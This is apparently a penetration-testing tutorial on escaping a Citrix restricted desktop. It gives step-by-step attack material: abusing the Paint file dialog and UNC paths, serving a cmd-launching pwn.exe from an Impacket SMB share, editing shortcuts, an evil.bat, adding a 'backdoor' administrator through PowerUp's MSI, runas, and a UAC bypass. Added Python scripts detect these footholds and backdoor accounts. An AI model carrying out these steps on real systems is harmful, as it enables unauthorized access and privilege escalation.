Citrix Breakout

Basic Methodology for break-out:

  1. Gain access to a Dialog Box.

  2. Exploit the Dialog Box to achieve command execution.

  3. Escalate privileges to gain higher levels of access.

Gaining a shell

Bypassing Path Restrictions

There are multiple ways to open a dialog box in Windows using tools such as Paint, Notepad, WordPad, etc. We will use MS Paint as the example for this section.

Run Paint from the Start menu and click File > Open to open the dialog box.

With the Windows dialog box open for Paint, enter the UNC path \\127.0.0.1\c$\users\pmorgan in the File name field, set the file type to All Files, and press Enter to reach the desired directory.

Accessing an SMB share from the restricted environment

Start our SMB server (Impacket's smbserver.py):

smbserver.py -smb2support share $(pwd)

Create a malicious file

The executable pwn.exe is a custom binary compiled from the following pwn.c, which on execution launches cmd.exe.

#include <stdlib.h>

/* Launches an interactive cmd.exe when run; the SMB share is what delivers
   this binary into the restricted session. */
int main(void) {
  system("C:\\Windows\\System32\\cmd.exe");
  return 0;
}

Upload the file

Back in the Citrix environment, launch Paint from the Start menu, then go to File > Open to bring up the dialog box. In the File name field enter the UNC path \\10.13.38.95\share, make sure the file type is set to All Files, and press Enter to enter the share.

Because File Explorer is restricted, files cannot be copied directly. Executables on the share can, however, still be right-clicked and launched.

Right-click pwn.exe and select Open; a prompt to run it appears, and a cmd console opens.

Modify an existing shortcut file

Unauthorized access to folder paths can also be achieved by modifying an existing Windows shortcut and setting the desired executable's path in the Target field. The steps are:

  1. Right-click the desired shortcut.

  2. Select Properties.

  3. In the Target field, change the path to the folder you want to access.

  4. Execute the shortcut and cmd will be spawned.

Script Execution

  1. Create a new text file and name it "evil.bat".

  2. Open "evil.bat" with a text editor such as Notepad.

  3. Enter the command "cmd" into the file.

  4. Save the file.

Executing "evil.bat" opens a Command Prompt window, which can then be used for further command-line operations.
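From a detection standpoint, each foothold in this section leaves the same kind of trace in process-creation telemetry: a child process whose parent is a document or accessory application (Paint, Notepad, WordPad), an image or parent image that lives on a UNC share, or an interactive shell started by a user who is not expected to have one in a published-app session. The Python below is an added example, not part of the original page or of any tool it names; it applies those three rules to constructed event lines modelled loosely on Sysmon Event ID 1 fields. The field names, the DIALOG_APPS, SHELLS and SHELL_ALLOWED_USERS lists and the sample user names are assumptions made for the example.

```python
import re
from pathlib import PureWindowsPath

# Constructed sample events, modelled loosely on Sysmon Event ID 1
# (process creation) fields. These lines are made up, not captured data.
SAMPLE_EVENTS = [
    'Image=C:\\Windows\\System32\\mspaint.exe ParentImage=C:\\Windows\\explorer.exe CommandLine="mspaint.exe" User=CORP\\pmorgan',
    'Image=\\\\10.13.38.95\\share\\pwn.exe ParentImage=C:\\Windows\\System32\\mspaint.exe CommandLine="\\\\10.13.38.95\\share\\pwn.exe" User=CORP\\pmorgan',
    'Image=C:\\Windows\\System32\\cmd.exe ParentImage=\\\\10.13.38.95\\share\\pwn.exe CommandLine="C:\\Windows\\System32\\cmd.exe" User=CORP\\pmorgan',
    'Image=C:\\Windows\\System32\\cmd.exe ParentImage=C:\\Windows\\explorer.exe CommandLine="cmd.exe /c evil.bat" User=CORP\\pmorgan',
    'Image=C:\\Windows\\System32\\notepad.exe ParentImage=C:\\Windows\\explorer.exe CommandLine="notepad.exe" User=CORP\\pmorgan',
    'Image=C:\\Windows\\System32\\cmd.exe ParentImage=C:\\Windows\\explorer.exe CommandLine="cmd.exe" User=CORP\\svc_admin',
]

# Hypothetical lists for this example; tune them to the real environment.
DIALOG_APPS = {"mspaint.exe", "notepad.exe", "wordpad.exe"}   # apps abused via File > Open
SHELLS = {"cmd.exe", "powershell.exe", "pwsh.exe"}            # interactive shells
SHELL_ALLOWED_USERS = {"CORP\\svc_admin"}                     # users expected to run a shell

# key=value pairs; values may be double-quoted when they contain spaces.
_FIELD = re.compile(r'(\w+)=("([^"]*)"|\S+)')


def parse_event(line):
    """Split a key=value event line into a dict, honouring quoted values."""
    return {m.group(1): (m.group(3) if m.group(3) is not None else m.group(2))
            for m in _FIELD.finditer(line)}


def basename(path):
    """Lower-cased file name of a Windows path (UNC paths included)."""
    return PureWindowsPath(path).name.lower()


def is_unc(path):
    """True when the path points at a network share (\\\\host\\share\\...)."""
    return path.startswith("\\\\")


def evaluate(event):
    """Return the names of the rules the event trips (empty list if none)."""
    hits = []
    image = event.get("Image", "")
    parent = event.get("ParentImage", "")
    if basename(parent) in DIALOG_APPS:
        hits.append("child_of_dialog_app")          # Paint/Notepad should not spawn children
    if is_unc(image) or is_unc(parent):
        hits.append("unc_path_execution")           # binary ran straight off a share
    if basename(image) in SHELLS and event.get("User") not in SHELL_ALLOWED_USERS:
        hits.append("shell_by_restricted_user")     # shortcut/.bat/pwn.exe all end here
    return hits


def analyze(lines):
    """Map the index of each suspicious line to the rules it tripped."""
    findings = {}
    for idx, line in enumerate(lines):
        hits = evaluate(parse_event(line))
        if hits:
            findings[idx] = hits
    return findings


if __name__ == "__main__":
    for idx, hits in analyze(SAMPLE_EVENTS).items():
        print(f"event {idx}: {', '.join(hits)}")
```

The first rule is the cheapest and the most specific: Paint and Notepad have no legitimate reason to create child processes, so a single parent-child pair is enough to alert on. The third rule is the broadest and is where tuning matters; in a locked-down published-app session a shell for an ordinary user is the alert, whereas on an admin workstation it is noise.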

Privilege Escalation

PowerUp

We can use PowerUp's Write-UserAddMSI function, which creates an .msi file directly on the desktop.

Import-Module .\PowerUp.ps1
Write-UserAddMSI

Now we can execute UserAdd.msi and create a new user backdoor:T3st@123 in the Administrators group. Note that a password that does not meet the password complexity policy will cause an error.

Back in cmd, run runas to start a command prompt as the newly created backdoor user.

runas /user:backdoor cmd
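The Write-UserAddMSI step and the runas that follows leave a tight sequence in the Windows Security log: an account creation (event 4720), a member added to the local Administrators group (4732) and a logon with explicit credentials, which runas produces (4648), all driven by the same low-privileged subject within minutes. The Python below is an added example, not code from the page or from PowerUp; it correlates constructed records shaped like those events and reports accounts that were created and elevated inside a short window, noting whether the new account was then used. The record layout, the ten-minute window and the sample account names are assumptions made for the example.

```python
from datetime import datetime, timedelta

# Constructed records modelled on Windows Security event IDs 4720 (account
# created), 4732 (member added to local group) and 4648 (logon with explicit
# credentials). Made up for this example, not captured data.
SAMPLE_SECURITY_EVENTS = [
    {"time": "2024-01-10T09:12:01", "id": 4720, "subject": "CORP\\pmorgan", "target": "backdoor"},
    {"time": "2024-01-10T09:12:02", "id": 4732, "subject": "CORP\\pmorgan", "target": "backdoor",
     "group": "Administrators"},
    {"time": "2024-01-10T09:13:30", "id": 4648, "subject": "CORP\\pmorgan", "target": "backdoor",
     "process": "C:\\Windows\\System32\\runas.exe"},
    {"time": "2024-01-10T14:00:00", "id": 4720, "subject": "CORP\\it_helpdesk", "target": "j.doe"},
    {"time": "2024-01-11T08:00:00", "id": 4732, "subject": "CORP\\it_helpdesk", "target": "j.doe",
     "group": "Remote Desktop Users"},
]

WINDOW = timedelta(minutes=10)           # assumed: create-then-elevate within 10 min is suspicious
PRIVILEGED_GROUPS = {"administrators"}   # assumed: local groups worth alerting on


def _when(event):
    return datetime.fromisoformat(event["time"])


def find_local_admin_backdoors(events):
    """Correlate 4720 -> 4732 -> 4648 and return one finding per elevated new account."""
    created = {}      # account name (lower-case) -> its 4720 record
    findings = []
    for event in sorted(events, key=_when):
        target = event["target"].lower()
        if event["id"] == 4720:
            created[target] = event
        elif event["id"] == 4732 and event.get("group", "").lower() in PRIVILEGED_GROUPS:
            origin = created.get(target)
            # Only a freshly created account being elevated is the pattern we want.
            if origin is not None and _when(event) - _when(origin) <= WINDOW:
                findings.append({
                    "account": event["target"],
                    "created_by": origin["subject"],
                    "elevated_at": event["time"],
                    "used": False,
                })
        elif event["id"] == 4648:
            # An explicit-credential logon to the new account means it was put to use.
            for finding in findings:
                if finding["account"].lower() == target:
                    finding["used"] = True
    return findings


if __name__ == "__main__":
    for finding in find_local_admin_backdoors(SAMPLE_SECURITY_EVENTS):
        print(finding)
```

The helpdesk records show why the time window and the group filter both matter: creating an account and later adding it to Remote Desktop Users is routine provisioning and produces no finding, while an ordinary user creating an account and making it an administrator one second later does.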

Bypassing UAC

Even though the newly created user backdoor is a member of the Administrators group, accessing the C:\users\Administrator directory is still not possible because of User Account Control (UAC).

Numerous UAC bypass scripts are available that get past the active User Account Control (UAC) mechanism and provide an elevated context.

Import-Module .\Bypass-UAC.ps1
Bypass-UAC -Method UacMethodSysprep
